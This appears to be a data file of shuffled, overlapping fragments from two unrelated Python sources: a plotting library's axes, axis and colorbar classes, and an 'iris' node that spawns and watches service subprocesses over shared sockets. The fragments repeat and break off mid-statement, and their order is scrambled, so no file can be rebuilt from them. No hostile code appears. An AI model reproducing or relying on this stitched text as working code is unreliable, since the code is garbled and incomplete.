remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def add_cursor( self,", "float, bounds: Optional[Tuple[float, float]] = None, ): pass def remove_line(self, id: str) ->", "axes. axes = ForwardTyped(lambda: Axes) #: Should that axis be autoscaled auto_scaling =", "# Distributed under the terms of the BSD license. # # The full", "in the file LICENCE, distributed with this software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar", "id: str, orientation: str, position: float, bounds: Optional[Tuple[float, float]] = None, ): pass", "FIXME need to sync to the proxy def _resolve_figure(): from .figure import Figure", "@mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self, position:", "any. colorbar = Typed(Colorbar) #: Set of cursors currently active on the graph", "of the object and the axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis, self.right_axis,", "c.backend_name = self.backend_name c.initialize(resolver) for p in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #:", "exist in axes {self}\") axes = plot.axes_mapping if not axes: axes = {", "axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str, button: str): pass @mark_backend_unsupported def", "def enable_panning(self, button: str): pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None):", "def remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def add_cursor( self, axes=None ):", "Existing axes are \" f\"{[ax for ax in axes.axes._fields if axes.axes[ax] is not", "Need to define the proper API to enable zooming/panning and modifiers # TODO", "a minor grid minor_grid_enabled = Bool() #: # SHOULD NOT be edited in", "the axis direction inverted. inverted = Bool() #: Label of the axis label", "(\"left\", \"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\") is None ) for pa in", "for {[lab for lab, _ in unknown]} do not \" \"correspond to any", "Int, List, Str from atom.api import Tuple as ATuple from atom.api import Typed", "to the proxy def _resolve_figure(): from .figure import Figure return Figure class Axes(PlotElement):", "#: Should that axis be autoscaled auto_scaling = Bool() #: List of 2", "the plot if we have a resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id):", "of the axis label = Str() #: Tick labels. tick_labels = List(str) #:", "if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a plot based on its ID.\"\"\"", "a reference to the resolver to be able to add more elements #:", "\"\"\"Proxy for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in matplotlib", "= List(tuple) #: Label of the axis label = Str() #: Tick labels.", "use on the axes. projection = Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if", "from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single", "scaling - bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError()", "in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not axis: continue axis.backend_name = self.backend_name axis.initialize(resolver)", "convenience to connect axes between them class Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\"", "Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\" #: Reference to the parent axes. axes", "axes {self}\") axes = plot.axes_mapping if not axes: axes = { \"x\": \"bottom\"", "id): \"\"\"Remove a plot based on its ID.\"\"\" if id not in self.plots:", "atom.api import Tuple as ATuple from atom.api import Typed from ..backends.resolver import BackendResolver", "): pass @mark_backend_unsupported def remove_line(self, id: str) -> None: pass class Axis(PlotElement): \"\"\"Axis", "the parent axes. axes = ForwardTyped(lambda: Axes) #: Position at which the colorbar", "raise RuntimeError(f\"A plot with {id} already exist in axes {self}\") axes = plot.axes_mapping", "pass @mark_backend_unsupported def enable_panning(self, button: str): pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def", "is not None]}, \" f\"specified axes are {[pa for _, pa in missing]}.\"", "plot # Initialize the plot if we have a resolver if self._resolver: plot.initialize(self._resolver)", "Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #: Should that axis", "def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button: str): pass @mark_backend_unsupported def disable_panning(self): pass", "= Typed(Colorbar) #: Set of cursors currently active on the graph cursors =", "between them class Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\" #: Reference to the", "\" \"correspond to any valid axes (valid axes are \" \"'left', 'right', 'top',", "which axes the cursor is bound pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def", "Label of the axis label = Str() #: Tick labels. tick_labels = List(str)", "self.colorbar.finalize() for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes:", "= Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar from the axes.\"\"\"", "str) #: Projection to use on the axes. projection = Enum(\"cartesian\", \"polar\") def", "@mark_backend_unsupported def enable_zooming(self, bound: str, button: str): pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported", "int): pass def add_plot(self, plot) -> None: \"\"\"Add a plot to the axes.\"\"\"", "self.proxy: raise RuntimeError(f\"Axes {self} does not have an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def", "Dict, Enum, Float, ForwardTyped, Int, List, Str from atom.api import Tuple as ATuple", "and modifiers # TODO Add the ability to link axes (accross different figures", "to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported", "remove_line(self, id: str) -> None: pass # FIXME Need to define the proper", "str): pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported def", "def disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported", "the cursor is bound pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass", "a way to prevent self recursion # FIXME Add convenience to connect axes", "we have a resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a plot", "object and the axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if", "for the label label_font = Dict(str) #: Font used for the tick labels", "p.initialize(resolver) #: Conserve a reference to the resolver to be able to add", "Typed(Axis) #: Colorbar associated with plot if any. colorbar = Typed(Colorbar) #: Set", "= self self.plots[plot.id] = plot # Initialize the plot if we have a", "pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button: str): pass @mark_backend_unsupported def", "the other axis in data coordinate. #: Setting this values will have an" ]
[]
[ "False def __init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets = {} self.processes =", "stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\" % self)", "self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port')))", "range from iris.core.interfaces import Interface from iris.utils.sockets import create_socket logger = logging.getLogger(__name__) class", "%s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all service processes to die", "p = Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self):", "name, c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name, c in", "six.moves import range from iris.core.interfaces import Interface from iris.utils.sockets import create_socket logger =", "logging.getLogger(__name__) class Process(object): def __init__(self, cmd, env=None): self.cmd = cmd self.env = env", "try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\" % self) self.stop()", "self.stop() self.start() def stats(self): try: memory = self._process.memory_info() return { 'memory': {'rss': memory.rss,", "in self._sockets: sock = create_socket( '%s:%s' % (host or self.container.ip, port), inheritable=True) self.sockets[port]", "self.sockets[port] = sock def restart_all(self): for process in self.processes: process.stop() def watch_processes(self): while", "env=None): self.cmd = cmd self.env = env self._process = None self._popen = None", "in self.processes: process.stop() def watch_processes(self): while True: for process in self.processes: try: status", "os import psutil import six from gevent import subprocess from six.moves import range", "= False def __init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets = {} self.processes", "= psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def restart(self): print(\"restarting", "self.processes = [] self.running = False self._sockets = [] self._services = [] def", "subprocess from six.moves import range from iris.core.interfaces import Interface from iris.utils.sockets import create_socket", "= True shared_fds = json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)}) for service_type,", "self.processes: try: status = process._process.status except psutil.NoSuchProcess: if self.running: process.start() continue if status", "for process in self.processes: try: status = process._process.status except psutil.NoSuchProcess: if self.running: process.start()", "super(Node, self).on_stop() def create_shared_sockets(self): for name, host, port in self._sockets: sock = create_socket(", "close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def", "[] def stats(self): process_stats = [] for p in self.processes: if not p.is_running():", "c.get('numprocesses', 1))) for name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self):", "{ 'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {}", "'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {} class", "super(Node, self).__init__(*args, **kwargs) self.sockets = {} self.processes = [] self.running = False self._sockets", "[] for p in self.processes: if not p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats':", "env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in range(num): p = Process(cmd.split(' '), env=env) self.processes.append(p)", "from iris.utils.sockets import create_socket logger = logging.getLogger(__name__) class Process(object): def __init__(self, cmd, env=None):", "gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all service processes to die ...\") self.running =", "class Process(object): def __init__(self, cmd, env=None): self.cmd = cmd self.env = env self._process", "self.sockets = {} self.processes = [] self.running = False self._sockets = [] self._services", "= None self._popen = None def is_running(self): return self._process and self._process.is_running() def start(self):", "for service_type, cmd, num in self._services: env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP']", "except psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator = False def __init__(self, *args, **kwargs):", "self._process.wait() except psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\" % self) self.stop() self.start() def", "or self.container.ip, port), inheritable=True) self.sockets[port] = sock def restart_all(self): for process in self.processes:", "{} class Node(Interface): register_with_coordinator = False def __init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs)", "six from gevent import subprocess from six.moves import range from iris.core.interfaces import Interface", "c.get('command'), c.get('numprocesses', 1))) for name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def", "self.running = True shared_fds = json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)}) for", "def stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\" %", "inheritable=True) self.sockets[port] = sock def restart_all(self): for process in self.processes: process.stop() def watch_processes(self):", "in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running = True shared_fds", "__init__(self, cmd, env=None): self.cmd = cmd self.env = env self._process = None self._popen", "return {} class Node(Interface): register_with_coordinator = False def __init__(self, *args, **kwargs): super(Node, self).__init__(*args,", "except psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\" % self) self.stop() self.start() def stats(self):", "memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator", "restart_all(self): for process in self.processes: process.stop() def watch_processes(self): while True: for process in", "import logging import gevent import os import psutil import six from gevent import", "self._process and self._process.is_running() def start(self): self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process =", "six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name,", "self.create_shared_sockets() self.running = True shared_fds = json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)})", "sock def restart_all(self): for process in self.processes: process.stop() def watch_processes(self): while True: for", "process in self.processes: try: status = process._process.status except psutil.NoSuchProcess: if self.running: process.start() continue", "'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator = False def", "env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass", "for name, host, port in self._sockets: sock = create_socket( '%s:%s' % (host or", "{'processes': process_stats} def apply_config(self, config): for name, c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'),", "...\") self.running = False for p in self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self):", "True: for process in self.processes: try: status = process._process.status except psutil.NoSuchProcess: if self.running:", "shared_fds = json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)}) for service_type, cmd, num", "cmd, num in self._services: env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip", "for name, c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name, c", "for name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running", "{})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running = True shared_fds = json.dumps({port:", "self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate()", "'stats': p.stats(), }) return {'processes': process_stats} def apply_config(self, config): for name, c in", "def stats(self): process_stats = [] for p in self.processes: if not p.is_running(): continue", "in self.processes: if not p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(), }) return", "name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running =", "shared_fds for i in range(num): p = Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting %s',", "self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in range(num): p =", "False for p in self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for name, host,", "**kwargs) self.sockets = {} self.processes = [] self.running = False self._sockets = []", "on_start(self): self.create_shared_sockets() self.running = True shared_fds = json.dumps({port: s.fileno() for port, s in", "in range(num): p = Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes)", "= cmd self.env = env self._process = None self._popen = None def is_running(self):", "logging import gevent import os import psutil import six from gevent import subprocess", "cmd, env=None): self.cmd = cmd self.env = env self._process = None self._popen =", "not p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(), }) return {'processes': process_stats} def", "process_stats.append({ 'command': p.cmd, 'stats': p.stats(), }) return {'processes': process_stats} def apply_config(self, config): for", "class Node(Interface): register_with_coordinator = False def __init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets", "self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in range(num): p = Process(cmd.split(' '), env=env)", "process.stop() def watch_processes(self): while True: for process in self.processes: try: status = process._process.status", "None def is_running(self): return self._process and self._process.is_running() def start(self): self._popen = subprocess.Popen( self.cmd,", "= env self._process = None self._popen = None def is_running(self): return self._process and", "name, host, port in self._sockets: sock = create_socket( '%s:%s' % (host or self.container.ip,", "from gevent import subprocess from six.moves import range from iris.core.interfaces import Interface from", "**kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets = {} self.processes = [] self.running = False", "= [] def stats(self): process_stats = [] for p in self.processes: if not", "p.stats(), }) return {'processes': process_stats} def apply_config(self, config): for name, c in six.iteritems(config.get('instances',", "os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in", "if self.running: process.start() continue if status in (psutil.STATUS_ZOMBIE, psutil.STATUS_DEAD): if self.running: process.restart() gevent.sleep(1)", "= None def is_running(self): return self._process and self._process.is_running() def start(self): self._popen = subprocess.Popen(", "__init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets = {} self.processes = [] self.running", "iris.core.interfaces import Interface from iris.utils.sockets import create_socket logger = logging.getLogger(__name__) class Process(object): def", "import subprocess from six.moves import range from iris.core.interfaces import Interface from iris.utils.sockets import", "= [] for p in self.processes: if not p.is_running(): continue process_stats.append({ 'command': p.cmd,", "process in self.processes: process.stop() def watch_processes(self): while True: for process in self.processes: try:", "self.env = env self._process = None self._popen = None def is_running(self): return self._process", "register_with_coordinator = False def __init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets = {}", "= Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting", "p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all service processes to die ...\") self.running", "json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)}) for service_type, cmd, num in self._services:", "for port, s in six.iteritems(self.sockets)}) for service_type, cmd, num in self._services: env =", "self.container.ip, port), inheritable=True) self.sockets[port] = sock def restart_all(self): for process in self.processes: process.stop()", "gevent import os import psutil import six from gevent import subprocess from six.moves", "num in self._services: env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS']", "= sock def restart_all(self): for process in self.processes: process.stop() def watch_processes(self): while True:", "in self.processes: try: status = process._process.status except psutil.NoSuchProcess: if self.running: process.start() continue if", "process._process.status except psutil.NoSuchProcess: if self.running: process.start() continue if status in (psutil.STATUS_ZOMBIE, psutil.STATUS_DEAD): if", "env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in range(num): p = Process(cmd.split('", "env self._process = None self._popen = None def is_running(self): return self._process and self._process.is_running()", "= [] self._services = [] def stats(self): process_stats = [] for p in", "try: memory = self._process.memory_info() return { 'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0),", "def __init__(self, cmd, env=None): self.cmd = cmd self.env = env self._process = None", "self._services = [] def stats(self): process_stats = [] for p in self.processes: if", "= False self._sockets = [] self._services = [] def stats(self): process_stats = []", "'command': p.cmd, 'stats': p.stats(), }) return {'processes': process_stats} def apply_config(self, config): for name,", "six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running = True shared_fds =", "gevent import subprocess from six.moves import range from iris.core.interfaces import Interface from iris.utils.sockets", "in self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for name, host, port in self._sockets:", "1))) for name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets()", "iris.utils.sockets import create_socket logger = logging.getLogger(__name__) class Process(object): def __init__(self, cmd, env=None): self.cmd", "start(self): self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self): try:", "import psutil import six from gevent import subprocess from six.moves import range from", "p in self.processes: if not p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(), })", "service processes to die ...\") self.running = False for p in self.processes: p.stop()", "= logging.getLogger(__name__) class Process(object): def __init__(self, cmd, env=None): self.cmd = cmd self.env =", "[] self.running = False self._sockets = [] self._services = [] def stats(self): process_stats", "to die ...\") self.running = False for p in self.processes: p.stop() super(Node, self).on_stop()", "sock = create_socket( '%s:%s' % (host or self.container.ip, port), inheritable=True) self.sockets[port] = sock", "for process in self.processes: process.stop() def watch_processes(self): while True: for process in self.processes:", "self._process = None self._popen = None def is_running(self): return self._process and self._process.is_running() def", "= self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in range(num): p", "[] self._services = [] def stats(self): process_stats = [] for p in self.processes:", "try: status = process._process.status except psutil.NoSuchProcess: if self.running: process.start() continue if status in", "*args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets = {} self.processes = [] self.running =", "self.processes: process.stop() def watch_processes(self): while True: for process in self.processes: try: status =", "self.start() def stats(self): try: memory = self._process.memory_info() return { 'memory': {'rss': memory.rss, 'vms':", "import os import psutil import six from gevent import subprocess from six.moves import", "in self._services: env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] =", "def start(self): self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self):", "import range from iris.core.interfaces import Interface from iris.utils.sockets import create_socket logger = logging.getLogger(__name__)", "cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all service processes to die ...\")", "True shared_fds = json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)}) for service_type, cmd,", "= json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)}) for service_type, cmd, num in", "self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator = False def __init__(self,", "six.iteritems(self.sockets)}) for service_type, cmd, num in self._services: env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint", "Process(object): def __init__(self, cmd, env=None): self.cmd = cmd self.env = env self._process =", "import Interface from iris.utils.sockets import create_socket logger = logging.getLogger(__name__) class Process(object): def __init__(self,", "self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all service processes", "= {} self.processes = [] self.running = False self._sockets = [] self._services =", "subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait() except", "= subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait()", "psutil import six from gevent import subprocess from six.moves import range from iris.core.interfaces", "= self._process.memory_info() return { 'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except", "p.cmd, 'stats': p.stats(), }) return {'processes': process_stats} def apply_config(self, config): for name, c", "s in six.iteritems(self.sockets)}) for service_type, cmd, num in self._services: env = os.environ.copy() env['IRIS_NODE']", "host, port in self._sockets: sock = create_socket( '%s:%s' % (host or self.container.ip, port),", "while True: for process in self.processes: try: status = process._process.status except psutil.NoSuchProcess: if", "self.running = False for p in self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for", "for all service processes to die ...\") self.running = False for p in", "self.processes: if not p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(), }) return {'processes':", "port), inheritable=True) self.sockets[port] = sock def restart_all(self): for process in self.processes: process.stop() def", "cmd self.env = env self._process = None self._popen = None def is_running(self): return", "c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running = True shared_fds = json.dumps({port: s.fileno() for", "s.fileno() for port, s in six.iteritems(self.sockets)}) for service_type, cmd, num in self._services: env", "in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name, c in six.iteritems(config.get('sockets', {})):", "= False for p in self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for name,", "all service processes to die ...\") self.running = False for p in self.processes:", "p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(), }) return {'processes': process_stats} def apply_config(self,", "from six.moves import range from iris.core.interfaces import Interface from iris.utils.sockets import create_socket logger", "Interface from iris.utils.sockets import create_socket logger = logging.getLogger(__name__) class Process(object): def __init__(self, cmd,", "print(\"restarting %s\" % self) self.stop() self.start() def stats(self): try: memory = self._process.memory_info() return", "= process._process.status except psutil.NoSuchProcess: if self.running: process.start() continue if status in (psutil.STATUS_ZOMBIE, psutil.STATUS_DEAD):", "json import logging import gevent import os import psutil import six from gevent", "config): for name, c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name,", "'%s:%s' % (host or self.container.ip, port), inheritable=True) self.sockets[port] = sock def restart_all(self): for", "logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all service processes to", "for p in self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for name, host, port", "port in self._sockets: sock = create_socket( '%s:%s' % (host or self.container.ip, port), inheritable=True)", "def stats(self): try: memory = self._process.memory_info() return { 'memory': {'rss': memory.rss, 'vms': memory.vms},", "in six.iteritems(self.sockets)}) for service_type, cmd, num in self._services: env = os.environ.copy() env['IRIS_NODE'] =", "env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for", "and self._process.is_running() def start(self): self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid)", "Node(Interface): register_with_coordinator = False def __init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets =", "if not p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(), }) return {'processes': process_stats}", "on_stop(self): logger.info(\"waiting for all service processes to die ...\") self.running = False for", "create_shared_sockets(self): for name, host, port in self._sockets: sock = create_socket( '%s:%s' % (host", "process_stats} def apply_config(self, config): for name, c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses',", "self._process.memory_info() return { 'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess:", "continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(), }) return {'processes': process_stats} def apply_config(self, config):", "range(num): p = Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def", "Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for", "self._sockets: sock = create_socket( '%s:%s' % (host or self.container.ip, port), inheritable=True) self.sockets[port] =", "False self._sockets = [] self._services = [] def stats(self): process_stats = [] for", "} except psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator = False def __init__(self, *args,", "self).on_stop() def create_shared_sockets(self): for name, host, port in self._sockets: sock = create_socket( '%s:%s'", "= os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i", "env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in range(num):", "status = process._process.status except psutil.NoSuchProcess: if self.running: process.start() continue if status in (psutil.STATUS_ZOMBIE,", "create_socket logger = logging.getLogger(__name__) class Process(object): def __init__(self, cmd, env=None): self.cmd = cmd", "{})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for name, c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'),", "memory = self._process.memory_info() return { 'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), }", "self.cmd = cmd self.env = env self._process = None self._popen = None def", "= shared_fds for i in range(num): p = Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting", "self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\" % self) self.stop() self.start()", "p in self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for name, host, port in", "import json import logging import gevent import os import psutil import six from", "die ...\") self.running = False for p in self.processes: p.stop() super(Node, self).on_stop() def", "self._popen = None def is_running(self): return self._process and self._process.is_running() def start(self): self._popen =", "import create_socket logger = logging.getLogger(__name__) class Process(object): def __init__(self, cmd, env=None): self.cmd =", "create_socket( '%s:%s' % (host or self.container.ip, port), inheritable=True) self.sockets[port] = sock def restart_all(self):", "'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator =", "self.running = False self._sockets = [] self._services = [] def stats(self): process_stats =", "%s\" % self) self.stop() self.start() def stats(self): try: memory = self._process.memory_info() return {", "psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator = False def __init__(self, *args, **kwargs): super(Node,", "def on_start(self): self.create_shared_sockets() self.running = True shared_fds = json.dumps({port: s.fileno() for port, s", "pass def restart(self): print(\"restarting %s\" % self) self.stop() self.start() def stats(self): try: memory", "def restart_all(self): for process in self.processes: process.stop() def watch_processes(self): while True: for process", "'), env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all", "logger.info(\"waiting for all service processes to die ...\") self.running = False for p", "c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 